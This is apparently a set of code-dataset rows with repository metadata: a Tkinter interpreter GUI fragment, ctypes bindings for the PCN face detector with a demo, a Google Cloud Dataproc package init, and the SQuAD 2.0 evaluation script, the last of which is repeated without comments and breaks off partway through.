self.content = self.builder.get_object('content', self.mainwindow)
self.actionBar = self.builder.get_object('actionBar', self.mainwindow)
self.generalInfoFrame = self.builder.get_object("generalInfoFrame", self.content)
self.programStateInfoFrame = self.builder.get_object("programStateInfoFrame", self.content)
self.canvasFrame = self.builder.get_object('canvasFrame', self.content)
self.canvas = self.builder.get_object('canvas', self.canvasFrame)
def update(self):
self.infoManager.updateInfo(self.image, self.graph, self.programState)
self.canvasManager.updateScaleSize(self.scaleSize)
self.canvasManager.updateImage(self.image)
self.canvasManager.updateProgramState(self.programState)
self.canvasManager.updateCanvas()
self.canvas.configure(scrollregion=self.canvas.bbox("all"))
def takeStep(self):
if self.image is None or self.programState is None or self.graph is None:
return None
newProgramState = main.takeStep(self.image, self.programState)
if isinstance(newProgramState, BaseException):
self.mainwindow.destroy()
self.mainwindow.quit()
raise newProgramState
self.programState = newProgramState
self.selectedPosition = self.programState.position
self.update()
return True
def setFileText(self, filePath):
self.builder.get_object("fileNameEntry", self.optionBar).delete(0, len(self.builder.get_object("fileNameEntry", self.optionBar).get()))
self.builder.get_object("fileNameEntry", self.optionBar).insert(0, filePath)
def setExecutionSpeed(self, pos):
if 0 < float(pos) < 100:
self.executionSpeed = float(pos)
def setScale(self):
scaleValue = int(self.builder.get_object('scaleEntry', self.optionBar).get())
if 0 < scaleValue < 100:
self.canvasManager.clearCanvas()
self.scaleSize = int(scaleValue)
self.update()
self.canvasManager.drawImage()
self.canvasManager.updateCanvas()
def loadFile(self):
fileName = self.builder.get_object('fileNameEntry', self.optionBar).get()
if len(fileName) < 1:
return None
try:
tmpImage = imageWrapper.getImage(fileName)
except FileNotFoundError:
edgeInfo = self.infoManager.builder.get_object('codelEdgesMessage', self.infoManager.generalInfo)
edgeInfo.configure(text="The file '{}' could not be found".format(fileName))
return False
tmpResult = lexer.graphImage(tmpImage)
if len(tmpResult[1]) != 0:
edgeInfo = self.infoManager.builder.get_object('codelEdgesMessage', self.infoManager.generalInfo)
edgeInfo.configure(text="The following exceptions occured while making the graph:\n{}".format("".join(list(map(lambda x: "\t{}\n".format(x), tmpResult[1])))))
return False
self.image = tmpImage
self.graph = tmpResult[0]
self.programState = programState(self.graph, position((0,0)), direction((0,0)))
self.canvasManager.previousProgramState = None
self.canvasManager.programState = None
self.update()
| true
| true
|
f707c5264e6ec80e70ed71e7ceed1450558bb7d9
| 6,126
|
py
|
Python
|
PCN/PyPCN.py
|
End-of-an-Era/PCN
|
3a2564caacad75c1351f5aca5d45bf246bcaa2d9
|
[
"BSD-2-Clause"
] | 317
|
2018-04-17T07:06:02.000Z
|
2018-10-19T01:42:30.000Z
|
PCN/PyPCN.py
|
DefTruth/FaceKit
|
043c3063014166d831c07197d4e6748e824a5587
|
[
"BSD-2-Clause"
] | 45
|
2019-01-14T18:17:01.000Z
|
2019-11-05T08:11:09.000Z
|
PCN/PyPCN.py
|
DefTruth/FaceKit
|
043c3063014166d831c07197d4e6748e824a5587
|
[
"BSD-2-Clause"
] | 86
|
2018-04-17T09:02:02.000Z
|
2018-10-18T11:14:31.000Z
|
#!/usr/bin/python3
from ctypes import *
import cv2
import numpy as np
import sys
import os
import time
from ipdb import set_trace as dbg
from enum import IntEnum
class CPoint(Structure):
_fields_ = [("x", c_int),
("y", c_int)]
FEAT_POINTS = 14
class CWindow(Structure):
_fields_ = [("x", c_int),
("y", c_int),
("width", c_int),
("angle", c_int),
("score", c_float),
("points",CPoint*FEAT_POINTS)]
class FeatEnam(IntEnum):
CHIN_0 = 0
CHIN_1 = 1
CHIN_2 = 2
CHIN_3 = 3
CHIN_4 = 4
CHIN_5 = 5
CHIN_6 = 6
CHIN_7 = 7
CHIN_8 = 8
NOSE = 9
EYE_LEFT = 10
EYE_RIGHT = 11
MOUTH_LEFT = 12
MOUTH_RIGHT = 13
FEAT_POINTS = 14
lib = CDLL("/usr/local/lib/libPCN.so")
init_detector = lib.init_detector
#void *init_detector(const char *detection_model_path,
# const char *pcn1_proto, const char *pcn2_proto, const char *pcn3_proto,
# const char *tracking_model_path, const char *tracking_proto,
# int min_face_size, float pyramid_scale_factor, float detection_thresh_stage1,
# float detection_thresh_stage2, float detection_thresh_stage3, int tracking_period,
# float tracking_thresh, int do_smooth)
init_detector.argtypes = [
c_char_p, c_char_p, c_char_p,
c_char_p, c_char_p, c_char_p,
c_int,c_float,c_float,c_float,
c_float,c_int,c_float,c_int]
init_detector.restype = c_void_p
#CWindow* detect_faces(void* pcn, unsigned char* raw_img,size_t rows, size_t cols, int *lwin)
detect_faces = lib.detect_faces
detect_faces.argtypes = [c_void_p, POINTER(c_ubyte),c_size_t,c_size_t,POINTER(c_int)]
detect_faces.restype = POINTER(CWindow)
#CWindow* detect_track_faces(void* pcn, unsigned char* raw_img,size_t rows, size_t cols, int *lwin)
detect_track_faces = lib.detect_track_faces
detect_track_faces.argtypes = [c_void_p, POINTER(c_ubyte),c_size_t,c_size_t,POINTER(c_int)]
detect_track_faces.restype = POINTER(CWindow)
#void free_faces(CWindow* wins)
free_faces = lib.free_faces
free_faces.argtypes= [c_void_p]
# void free_detector(void *pcn)
free_detector = lib.free_detector
free_detector.argtypes= [c_void_p]
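# Lifecycle of these bindings, as used in __main__ below: init_detector()
# returns an opaque handle; each detect_faces()/detect_track_faces() call
# returns a CWindow array that must be released with free_faces(); the handle
# itself is released with free_detector().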
CYAN=(255,255,0)
BLUE=(255,0,0)
RED=(0,0,255)
GREEN=(0,255,0)
YELLOW=(0,255,255)
def DrawFace(win,img):
width = 2
x1 = win.x
y1 = win.y
x2 = win.width + win.x - 1
y2 = win.width + win.y - 1
centerX = (x1 + x2) / 2
centerY = (y1 + y2) / 2
angle = win.angle
R = cv2.getRotationMatrix2D((centerX,centerY),angle,1)
pts = np.array([[x1,y1,1],[x1,y2,1],[x2,y2,1],[x2,y1,1]], np.int32)
pts = (pts @ R.T).astype(int) #Rotate points
pts = pts.reshape((-1,1,2))
cv2.polylines(img,[pts],True,CYAN,width)
cv2.line(img, (pts[0][0][0],pts[0][0][1]), (pts[3][0][0],pts[3][0][1]), BLUE, width)
def DrawPoints(win,img):
width = 2
f = FeatEnam.NOSE
cv2.circle(img,(win.points[f].x,win.points[f].y),width,GREEN,-1)
f = FeatEnam.EYE_LEFT
cv2.circle(img,(win.points[f].x,win.points[f].y),width,YELLOW,-1)
f = FeatEnam.EYE_RIGHT
cv2.circle(img,(win.points[f].x,win.points[f].y),width,YELLOW,-1)
f = FeatEnam.MOUTH_LEFT
cv2.circle(img,(win.points[f].x,win.points[f].y),width,RED,-1)
f = FeatEnam.MOUTH_RIGHT
cv2.circle(img,(win.points[f].x,win.points[f].y),width,RED,-1)
for i in range(8):
cv2.circle(img,(win.points[i].x,win.points[i].y),width,BLUE,-1)
def SetThreadCount(threads):
os.environ['OMP_NUM_THREADS'] = str(threads)
def c_str(str_in):
return c_char_p(str_in.encode('utf-8'))
video_flag = 0
if __name__=="__main__":
SetThreadCount(1)
path = '/usr/local/share/pcn/'
detection_model_path = c_str(path + "PCN.caffemodel")
pcn1_proto = c_str(path + "PCN-1.prototxt")
pcn2_proto = c_str(path + "PCN-2.prototxt")
pcn3_proto = c_str(path + "PCN-3.prototxt")
tracking_model_path = c_str(path + "PCN-Tracking.caffemodel")
tracking_proto = c_str(path + "PCN-Tracking.prototxt")
if video_flag:
cap = cv2.VideoCapture(0)
detector = init_detector(detection_model_path,pcn1_proto,pcn2_proto,pcn3_proto,
tracking_model_path,tracking_proto,
40,1.45,0.5,0.5,0.98,30,0.9,1)
width = cap.get(cv2.CAP_PROP_FRAME_WIDTH)
height = cap.get(cv2.CAP_PROP_FRAME_HEIGHT)
fps = cap.get(cv2.CAP_PROP_FPS)
while cap.isOpened():
ret, frame = cap.read()
if ret == False:
break
start = time.time()
face_count = c_int(0)
raw_data = frame.ctypes.data_as(POINTER(c_ubyte))
windows = detect_track_faces(detector, raw_data,
int(height), int(width),
pointer(face_count))
end = time.time()
for i in range(face_count.value):
DrawFace(windows[i],frame)
DrawPoints(windows[i],frame)
free_faces(windows)
fps = int(1 / (end - start))
cv2.putText(frame, str(fps) + "fps", (20, 45), 4, 1, (0, 0, 125))
cv2.imshow('PCN', frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
else:
detector = init_detector(detection_model_path,pcn1_proto,pcn2_proto,pcn3_proto,
tracking_model_path,tracking_proto,
40,1.45,0.5,0.5,0.98,30,0.9,0)
for i in range(1, 27):
frame = cv2.imread("imgs/" + str(i) + ".jpg")
start = time.time()
face_count = c_int(0)
raw_data = frame.ctypes.data_as(POINTER(c_ubyte))
windows = detect_faces(detector, raw_data,
frame.shape[0], frame.shape[1],
pointer(face_count))
end = time.time()
print(i, end - start, "s")
for i in range(face_count.value):
DrawFace(windows[i],frame)
DrawPoints(windows[i],frame)
free_faces(windows)
cv2.imshow('PCN', frame)
cv2.waitKey()
free_detector(detector)
| 33.845304
| 99
| 0.616389
|
from ctypes import *
import cv2
import numpy as np
import sys
import os
import time
from ipdb import set_trace as dbg
from enum import IntEnum
class CPoint(Structure):
_fields_ = [("x", c_int),
("y", c_int)]
FEAT_POINTS = 14
class CWindow(Structure):
_fields_ = [("x", c_int),
("y", c_int),
("width", c_int),
("angle", c_int),
("score", c_float),
("points",CPoint*FEAT_POINTS)]
class FeatEnam(IntEnum):
CHIN_0 = 0
CHIN_1 = 1
CHIN_2 = 2
CHIN_3 = 3
CHIN_4 = 4
CHIN_5 = 5
CHIN_6 = 6
CHIN_7 = 7
CHIN_8 = 8
NOSE = 9
EYE_LEFT = 10
EYE_RIGHT = 11
MOUTH_LEFT = 12
MOUTH_RIGHT = 13
FEAT_POINTS = 14
lib = CDLL("/usr/local/lib/libPCN.so")
init_detector = lib.init_detector
init_detector.argtypes = [
c_char_p, c_char_p, c_char_p,
c_char_p, c_char_p, c_char_p,
c_int,c_float,c_float,c_float,
c_float,c_int,c_float,c_int]
init_detector.restype = c_void_p
detect_faces = lib.detect_faces
detect_faces.argtypes = [c_void_p, POINTER(c_ubyte),c_size_t,c_size_t,POINTER(c_int)]
detect_faces.restype = POINTER(CWindow)
detect_track_faces = lib.detect_track_faces
detect_track_faces.argtypes = [c_void_p, POINTER(c_ubyte),c_size_t,c_size_t,POINTER(c_int)]
detect_track_faces.restype = POINTER(CWindow)
free_faces = lib.free_faces
free_faces.argtypes= [c_void_p]
free_detector = lib.free_detector
free_detector.argtypes= [c_void_p]
CYAN=(255,255,0)
BLUE=(255,0,0)
RED=(0,0,255)
GREEN=(0,255,0)
YELLOW=(0,255,255)
def DrawFace(win,img):
width = 2
x1 = win.x
y1 = win.y
x2 = win.width + win.x - 1
y2 = win.width + win.y - 1
centerX = (x1 + x2) / 2
centerY = (y1 + y2) / 2
angle = win.angle
R = cv2.getRotationMatrix2D((centerX,centerY),angle,1)
pts = np.array([[x1,y1,1],[x1,y2,1],[x2,y2,1],[x2,y1,1]], np.int32)
pts = (pts @ R.T).astype(int)
pts = pts.reshape((-1,1,2))
cv2.polylines(img,[pts],True,CYAN,width)
cv2.line(img, (pts[0][0][0],pts[0][0][1]), (pts[3][0][0],pts[3][0][1]), BLUE, width)
def DrawPoints(win,img):
width = 2
f = FeatEnam.NOSE
cv2.circle(img,(win.points[f].x,win.points[f].y),width,GREEN,-1)
f = FeatEnam.EYE_LEFT
cv2.circle(img,(win.points[f].x,win.points[f].y),width,YELLOW,-1)
f = FeatEnam.EYE_RIGHT
cv2.circle(img,(win.points[f].x,win.points[f].y),width,YELLOW,-1)
f = FeatEnam.MOUTH_LEFT
cv2.circle(img,(win.points[f].x,win.points[f].y),width,RED,-1)
f = FeatEnam.MOUTH_RIGHT
cv2.circle(img,(win.points[f].x,win.points[f].y),width,RED,-1)
for i in range(8):
cv2.circle(img,(win.points[i].x,win.points[i].y),width,BLUE,-1)
def SetThreadCount(threads):
os.environ['OMP_NUM_THREADS'] = str(threads)
def c_str(str_in):
return c_char_p(str_in.encode('utf-8'))
video_flag = 0
if __name__=="__main__":
SetThreadCount(1)
path = '/usr/local/share/pcn/'
detection_model_path = c_str(path + "PCN.caffemodel")
pcn1_proto = c_str(path + "PCN-1.prototxt")
pcn2_proto = c_str(path + "PCN-2.prototxt")
pcn3_proto = c_str(path + "PCN-3.prototxt")
tracking_model_path = c_str(path + "PCN-Tracking.caffemodel")
tracking_proto = c_str(path + "PCN-Tracking.prototxt")
if video_flag:
cap = cv2.VideoCapture(0)
detector = init_detector(detection_model_path,pcn1_proto,pcn2_proto,pcn3_proto,
tracking_model_path,tracking_proto,
40,1.45,0.5,0.5,0.98,30,0.9,1)
width = cap.get(cv2.CAP_PROP_FRAME_WIDTH)
height = cap.get(cv2.CAP_PROP_FRAME_HEIGHT)
fps = cap.get(cv2.CAP_PROP_FPS)
while cap.isOpened():
ret, frame = cap.read()
if ret == False:
break
start = time.time()
face_count = c_int(0)
raw_data = frame.ctypes.data_as(POINTER(c_ubyte))
windows = detect_track_faces(detector, raw_data,
int(height), int(width),
pointer(face_count))
end = time.time()
for i in range(face_count.value):
DrawFace(windows[i],frame)
DrawPoints(windows[i],frame)
free_faces(windows)
fps = int(1 / (end - start))
cv2.putText(frame, str(fps) + "fps", (20, 45), 4, 1, (0, 0, 125))
cv2.imshow('PCN', frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
else:
detector = init_detector(detection_model_path,pcn1_proto,pcn2_proto,pcn3_proto,
tracking_model_path,tracking_proto,
40,1.45,0.5,0.5,0.98,30,0.9,0)
for i in range(1, 27):
frame = cv2.imread("imgs/" + str(i) + ".jpg")
start = time.time()
face_count = c_int(0)
raw_data = frame.ctypes.data_as(POINTER(c_ubyte))
windows = detect_faces(detector, raw_data,
frame.shape[0], frame.shape[1],
pointer(face_count))
end = time.time()
print(i, end - start, "s")
for i in range(face_count.value):
DrawFace(windows[i],frame)
DrawPoints(windows[i],frame)
free_faces(windows)
cv2.imshow('PCN', frame)
cv2.waitKey()
free_detector(detector)
| true
| true
|
f707c5fad6d4f32d6fa459e9433bae461f6298ac
| 1,049
|
py
|
Python
|
dataproc/google/cloud/dataproc.py
|
erikwebb/google-cloud-python
|
288a878e9a07239015c78a193eca1cc15e926127
|
[
"Apache-2.0"
] | 1
|
2019-04-16T08:13:06.000Z
|
2019-04-16T08:13:06.000Z
|
dataproc/google/cloud/dataproc.py
|
erikwebb/google-cloud-python
|
288a878e9a07239015c78a193eca1cc15e926127
|
[
"Apache-2.0"
] | null | null | null |
dataproc/google/cloud/dataproc.py
|
erikwebb/google-cloud-python
|
288a878e9a07239015c78a193eca1cc15e926127
|
[
"Apache-2.0"
] | 1
|
2020-11-15T11:44:36.000Z
|
2020-11-15T11:44:36.000Z
|
# -*- coding: utf-8 -*-
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from google.cloud.dataproc_v1 import ClusterControllerClient
from google.cloud.dataproc_v1 import JobControllerClient
from google.cloud.dataproc_v1 import WorkflowTemplateServiceClient
from google.cloud.dataproc_v1 import enums
from google.cloud.dataproc_v1 import types
__all__ = (
"enums",
"types",
"ClusterControllerClient",
"JobControllerClient",
"WorkflowTemplateServiceClient",
)
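# Minimal usage sketch (the project id and region are placeholders, and
# application-default credentials are assumed to be configured):
# from google.cloud import dataproc
# client = dataproc.ClusterControllerClient()
# for cluster in client.list_clusters("my-project", "global"):
#     print(cluster.cluster_name)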
| 32.78125
| 74
| 0.775024
|
from __future__ import absolute_import
from google.cloud.dataproc_v1 import ClusterControllerClient
from google.cloud.dataproc_v1 import JobControllerClient
from google.cloud.dataproc_v1 import WorkflowTemplateServiceClient
from google.cloud.dataproc_v1 import enums
from google.cloud.dataproc_v1 import types
__all__ = (
"enums",
"types",
"ClusterControllerClient",
"JobControllerClient",
"WorkflowTemplateServiceClient",
)
| true
| true
|
f707c6154d1287ce9821836e38935dafa47e3ce9
| 13,454
|
py
|
Python
|
examples/evaluate.py
|
Nstats/cs_capsule
|
e45a8518a41117d4b5f105bcc2c96a3d621e40ea
|
[
"Apache-2.0"
] | 1
|
2020-05-25T16:17:47.000Z
|
2020-05-25T16:17:47.000Z
|
examples/evaluate.py
|
Nstats/cs_capsule
|
e45a8518a41117d4b5f105bcc2c96a3d621e40ea
|
[
"Apache-2.0"
] | null | null | null |
examples/evaluate.py
|
Nstats/cs_capsule
|
e45a8518a41117d4b5f105bcc2c96a3d621e40ea
|
[
"Apache-2.0"
] | null | null | null |
#*#*#*./examples/evaluate.py
"""Official evaluation script for SQuAD version 2.0.
In addition to basic functionality, we also compute additional statistics and
plot precision-recall curves if an additional na_prob.json file is provided.
This file is expected to map question ID's to the model's predicted probability
that a question is unanswerable.
"""
import argparse
import collections
import json
import numpy as np
import os
import re
import string
import sys
OPTS = None
def parse_args():
parser = argparse.ArgumentParser('Official evaluation script for SQuAD version 2.0.')
parser.add_argument('data_file', metavar='data.json', help='Input data JSON file.')
parser.add_argument('pred_file', metavar='pred.json', help='Model predictions.')
parser.add_argument('--out-file', '-o', metavar='eval.json',
help='Write accuracy metrics to file (default is stdout).')
parser.add_argument('--na-prob-file', '-n', metavar='na_prob.json',
help='Model estimates of probability of no answer.')
parser.add_argument('--na-prob-thresh', '-t', type=float, default=1.0,
help='Predict "" if no-answer probability exceeds this (default = 1.0).')
parser.add_argument('--out-image-dir', '-p', metavar='out_images', default=None,
help='Save precision-recall curves to directory.')
parser.add_argument('--verbose', '-v', action='store_true')
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
return parser.parse_args()
def make_qid_to_has_ans(dataset):
qid_to_has_ans = {}
for article in dataset:
for p in article['paragraphs']:
for qa in p['qas']:
qid_to_has_ans[qa['id']] = bool(qa['answers'])
return qid_to_has_ans
def normalize_answer(s):
"""Lower text and remove punctuation, articles and extra whitespace."""
def remove_articles(text):
regex = re.compile(r'\b(a|an|the)\b', re.UNICODE)
return re.sub(regex, ' ', text)
def white_space_fix(text):
return ' '.join(text.split())
def remove_punc(text):
exclude = set(string.punctuation)
return ''.join(ch for ch in text if ch not in exclude)
def lower(text):
return text.lower()
return white_space_fix(remove_articles(remove_punc(lower(s))))
def get_tokens(s):
if not s: return []
return normalize_answer(s).split()
def compute_exact(a_gold, a_pred):
return int(normalize_answer(a_gold) == normalize_answer(a_pred))
def compute_f1(a_gold, a_pred):
gold_toks = get_tokens(a_gold)  # token list of the gold answer
pred_toks = get_tokens(a_pred)
common = collections.Counter(gold_toks) & collections.Counter(pred_toks)  # e.g. Counter([1,2,33]) & Counter([2,3,4]) == Counter({2: 1})
num_same = sum(common.values())  # total number of tokens shared between gold and prediction
if len(gold_toks) == 0 or len(pred_toks) == 0:  # no-answer questions are compared directly
# If either is no-answer, then F1 is 1 if they agree, 0 otherwise
return int(gold_toks == pred_toks)
if num_same == 0:
return 0
precision = 1.0 * num_same / len(pred_toks)  # precision over predicted tokens
recall = 1.0 * num_same / len(gold_toks)  # recall over gold tokens
f1 = (2 * precision * recall) / (precision + recall)  # harmonic mean (F1)
return f1
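# Worked example: gold "the cat sat" vs. pred "cat sat down". Normalization
# drops the article "the", so gold_toks = ["cat", "sat"] and
# pred_toks = ["cat", "sat", "down"]; num_same = 2, precision = 2/3,
# recall = 2/2 = 1, and f1 = 2 * (2/3 * 1) / (2/3 + 1) = 0.8.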
def get_raw_scores(dataset, preds):
exact_scores = {}
f1_scores = {}
for article in dataset:
for p in article['paragraphs']:
for qa in p['qas']:
qid = qa['id']
gold_answers = [a['text'] for a in qa['answers']
if normalize_answer(a['text'])]
if not gold_answers:
# For unanswerable questions, only correct answer is empty string
gold_answers = ['']
if qid not in preds:
print('Missing prediction for %s' % qid)
continue
a_pred = preds[qid]
# Take max over all gold answers
exact_scores[qid] = max(compute_exact(a, a_pred) for a in gold_answers)
f1_scores[qid] = max(compute_f1(a, a_pred) for a in gold_answers)
return exact_scores, f1_scores
def apply_no_ans_threshold(scores, na_probs, qid_to_has_ans, na_prob_thresh):
new_scores = {}
for qid, s in scores.items():
pred_na = na_probs[qid] > na_prob_thresh  # the model predicts no-answer for this question
if pred_na:
new_scores[qid] = float(not qid_to_has_ans[qid])
else:
new_scores[qid] = s
return new_scores
def make_eval_dict(exact_scores, f1_scores, qid_list=None):
if not qid_list:
total = len(exact_scores)
return collections.OrderedDict([
('exact', 100.0 * sum(exact_scores.values()) / total),
('f1', 100.0 * sum(f1_scores.values()) / total),
('total', total),
])
else:
total = len(qid_list)
return collections.OrderedDict([
('exact', 100.0 * sum(exact_scores[k] for k in qid_list) / total),
('f1', 100.0 * sum(f1_scores[k] for k in qid_list) / total),
('total', total),
])
def merge_eval(main_eval, new_eval, prefix):
for k in new_eval:
main_eval['%s_%s' % (prefix, k)] = new_eval[k]
def plot_pr_curve(precisions, recalls, out_image, title):
plt.step(recalls, precisions, color='b', alpha=0.2, where='post')
plt.fill_between(recalls, precisions, step='post', alpha=0.2, color='b')
plt.xlabel('Recall')
plt.ylabel('Precision')
plt.xlim([0.0, 1.05])
plt.ylim([0.0, 1.05])
plt.title(title)
plt.savefig(out_image)
plt.clf()
def make_precision_recall_eval(scores, na_probs, num_true_pos, qid_to_has_ans,
out_image=None, title=None):
qid_list = sorted(na_probs, key=lambda k: na_probs[k])
true_pos = 0.0
cur_p = 1.0
cur_r = 0.0
precisions = [1.0]
recalls = [0.0]
avg_prec = 0.0
for i, qid in enumerate(qid_list):
if qid_to_has_ans[qid]:
true_pos += scores[qid]
cur_p = true_pos / float(i+1)
cur_r = true_pos / float(num_true_pos)
if i == len(qid_list) - 1 or na_probs[qid] != na_probs[qid_list[i+1]]:
# i.e., if we can put a threshold after this point
avg_prec += cur_p * (cur_r - recalls[-1])
precisions.append(cur_p)
recalls.append(cur_r)
if out_image:
plot_pr_curve(precisions, recalls, out_image, title)
return {'ap': 100.0 * avg_prec}
def run_precision_recall_analysis(main_eval, exact_raw, f1_raw, na_probs,
qid_to_has_ans, out_image_dir):
if out_image_dir and not os.path.exists(out_image_dir):
os.makedirs(out_image_dir)
num_true_pos = sum(1 for v in qid_to_has_ans.values() if v)
if num_true_pos == 0:
return
pr_exact = make_precision_recall_eval(
exact_raw, na_probs, num_true_pos, qid_to_has_ans,
out_image=os.path.join(out_image_dir, 'pr_exact.png'),
title='Precision-Recall curve for Exact Match score')
pr_f1 = make_precision_recall_eval(
f1_raw, na_probs, num_true_pos, qid_to_has_ans,
out_image=os.path.join(out_image_dir, 'pr_f1.png'),
title='Precision-Recall curve for F1 score')
oracle_scores = {k: float(v) for k, v in qid_to_has_ans.items()}
pr_oracle = make_precision_recall_eval(
oracle_scores, na_probs, num_true_pos, qid_to_has_ans,
out_image=os.path.join(out_image_dir, 'pr_oracle.png'),
title='Oracle Precision-Recall curve (binary task of HasAns vs. NoAns)')
merge_eval(main_eval, pr_exact, 'pr_exact')
merge_eval(main_eval, pr_f1, 'pr_f1')
merge_eval(main_eval, pr_oracle, 'pr_oracle')
def histogram_na_prob(na_probs, qid_list, image_dir, name):
if not qid_list:
return
x = [na_probs[k] for k in qid_list]
weights = np.ones_like(x) / float(len(x))
plt.hist(x, weights=weights, bins=20, range=(0.0, 1.0))
plt.xlabel('Model probability of no-answer')
plt.ylabel('Proportion of dataset')
plt.title('Histogram of no-answer probability: %s' % name)
plt.savefig(os.path.join(image_dir, 'na_prob_hist_%s.png' % name))
plt.clf()
def find_best_thresh(preds, scores, na_probs, qid_to_has_ans):
num_no_ans = sum(1 for k in qid_to_has_ans if not qid_to_has_ans[k])
cur_score = num_no_ans
best_score = cur_score
best_thresh = 0.0
qid_list = sorted(na_probs, key=lambda k: na_probs[k])  # sort ascending by no-answer probability
for i, qid in enumerate(qid_list):
if qid not in scores: continue
if qid_to_has_ans[qid]:
diff = scores[qid]
else:
if preds[qid]:
diff = -1
else:
diff = 0
cur_score += diff
if cur_score > best_score:
best_score = cur_score
best_thresh = na_probs[qid]
return 100.0 * best_score / len(scores), best_thresh
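# How the sweep above works: starting from the score obtained by predicting
# no-answer for everything, qids are visited in order of increasing no-answer
# probability; each visit adds the gain (or penalty) of answering that
# question, and the threshold with the best running total is kept.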
def find_all_best_thresh(main_eval, preds, exact_raw, f1_raw, na_probs, qid_to_has_ans):
best_exact, exact_thresh = find_best_thresh(preds, exact_raw, na_probs, qid_to_has_ans)
best_f1, f1_thresh = find_best_thresh(preds, f1_raw, na_probs, qid_to_has_ans)
main_eval['best_exact'] = best_exact
main_eval['best_exact_thresh'] = exact_thresh
main_eval['best_f1'] = best_f1
main_eval['best_f1_thresh'] = f1_thresh
def main():
with open(OPTS.data_file) as f:
dataset_json = json.load(f)
dataset = dataset_json['data']
with open(OPTS.pred_file) as f:
preds = json.load(f)
if OPTS.na_prob_file:
with open(OPTS.na_prob_file) as f:
na_probs = json.load(f)
else:
na_probs = {k: 0.0 for k in preds}
qid_to_has_ans = make_qid_to_has_ans(dataset) # maps qid to True/False
has_ans_qids = [k for k, v in qid_to_has_ans.items() if v]
no_ans_qids = [k for k, v in qid_to_has_ans.items() if not v]
exact_raw, f1_raw = get_raw_scores(dataset, preds)  # per-question exact-match and F1 scores
exact_thresh = apply_no_ans_threshold(exact_raw, na_probs, qid_to_has_ans,
OPTS.na_prob_thresh)
f1_thresh = apply_no_ans_threshold(f1_raw, na_probs, qid_to_has_ans,
OPTS.na_prob_thresh)
out_eval = make_eval_dict(exact_thresh, f1_thresh)
if has_ans_qids:
has_ans_eval = make_eval_dict(exact_thresh, f1_thresh, qid_list=has_ans_qids)
merge_eval(out_eval, has_ans_eval, 'HasAns')
if no_ans_qids:
no_ans_eval = make_eval_dict(exact_thresh, f1_thresh, qid_list=no_ans_qids)
merge_eval(out_eval, no_ans_eval, 'NoAns')
if OPTS.na_prob_file:
find_all_best_thresh(out_eval, preds, exact_raw, f1_raw, na_probs, qid_to_has_ans)
if OPTS.na_prob_file and OPTS.out_image_dir:
run_precision_recall_analysis(out_eval, exact_raw, f1_raw, na_probs,
qid_to_has_ans, OPTS.out_image_dir)
histogram_na_prob(na_probs, has_ans_qids, OPTS.out_image_dir, 'hasAns')
histogram_na_prob(na_probs, no_ans_qids, OPTS.out_image_dir, 'noAns')
if OPTS.out_file:
with open(OPTS.out_file, 'w') as f:
json.dump(out_eval, f)
else:
print(json.dumps(out_eval, indent=2))
def judgeOnline(data_file,pred_file,na_prob_file,output_dir,epoch,train_steps):
if not os.path.exists(os.path.join(output_dir,"eval_res")):
os.makedirs(os.path.join(output_dir,"eval_res"))
output = os.path.join(output_dir,"eval_res")
out_file = os.path.join(output,"eval.json")
out_image_dir = None
na_prob_thresh = 1.0
with open(data_file) as f:
dataset_json = json.load(f)
dataset = dataset_json['data']
with open(pred_file) as f:
preds = json.load(f)
with open(na_prob_file) as f:
na_probs = json.load(f)
exact_raw, f1_raw = get_raw_scores(dataset, preds)
qid_to_has_ans = make_qid_to_has_ans(dataset)  # maps qid to True/False, splitting the dev set into answerable and unanswerable
has_ans_qids = [k for k, v in qid_to_has_ans.items() if v]  # answerable questions
no_ans_qids = [k for k, v in qid_to_has_ans.items() if not v]  # unanswerable questions
exact_thresh = apply_no_ans_threshold(exact_raw, na_probs, qid_to_has_ans,
na_prob_thresh)  # no effect here because the default threshold is 1.0; see apply_no_ans_threshold
f1_thresh = apply_no_ans_threshold(f1_raw, na_probs, qid_to_has_ans,
na_prob_thresh)  # no effect here because the default threshold is 1.0; see apply_no_ans_threshold
out_eval = make_eval_dict(exact_thresh, f1_thresh)
if has_ans_qids:
has_ans_eval = make_eval_dict(exact_thresh, f1_thresh, qid_list=has_ans_qids)
merge_eval(out_eval, has_ans_eval, 'HasAns')
if no_ans_qids:
no_ans_eval = make_eval_dict(exact_thresh, f1_thresh, qid_list=no_ans_qids)
merge_eval(out_eval, no_ans_eval, 'NoAns')
if na_prob_file:  # if a null_odds.json file was supplied
find_all_best_thresh(out_eval, preds, exact_raw, f1_raw, na_probs, qid_to_has_ans)  # find the best thresholds
if na_prob_file and out_image_dir:
run_precision_recall_analysis(out_eval, exact_raw, f1_raw, na_probs,
qid_to_has_ans, out_image_dir)
histogram_na_prob(na_probs, has_ans_qids, out_image_dir, 'hasAns')
histogram_na_prob(na_probs, no_ans_qids, out_image_dir, 'noAns')
if out_file:
with open(out_file, 'a') as fout:
fout.write("epoch:{} steps:{} evaluation res:{}\n".format(epoch,train_steps,json.dumps(out_eval, sort_keys=True, indent=2)))
import logging
logger = logging.getLogger(__name__)
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt='%m/%d/%Y %H:%M:%S',
level=logging.INFO )
logger.info("write evaluation result to " + out_file + "OK!")
else:
print(json.dumps(out_eval, indent=2))
return out_eval
if __name__ == '__main__':
OPTS = parse_args()
if OPTS.out_image_dir:
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
print(vars(OPTS))
main()
| 39.922849
| 138
| 0.676081
|
import argparse
import collections
import json
import numpy as np
import os
import re
import string
import sys
OPTS = None
def parse_args():
parser = argparse.ArgumentParser('Official evaluation script for SQuAD version 2.0.')
parser.add_argument('data_file', metavar='data.json', help='Input data JSON file.')
parser.add_argument('pred_file', metavar='pred.json', help='Model predictions.')
parser.add_argument('--out-file', '-o', metavar='eval.json',
help='Write accuracy metrics to file (default is stdout).')
parser.add_argument('--na-prob-file', '-n', metavar='na_prob.json',
help='Model estimates of probability of no answer.')
parser.add_argument('--na-prob-thresh', '-t', type=float, default=1.0,
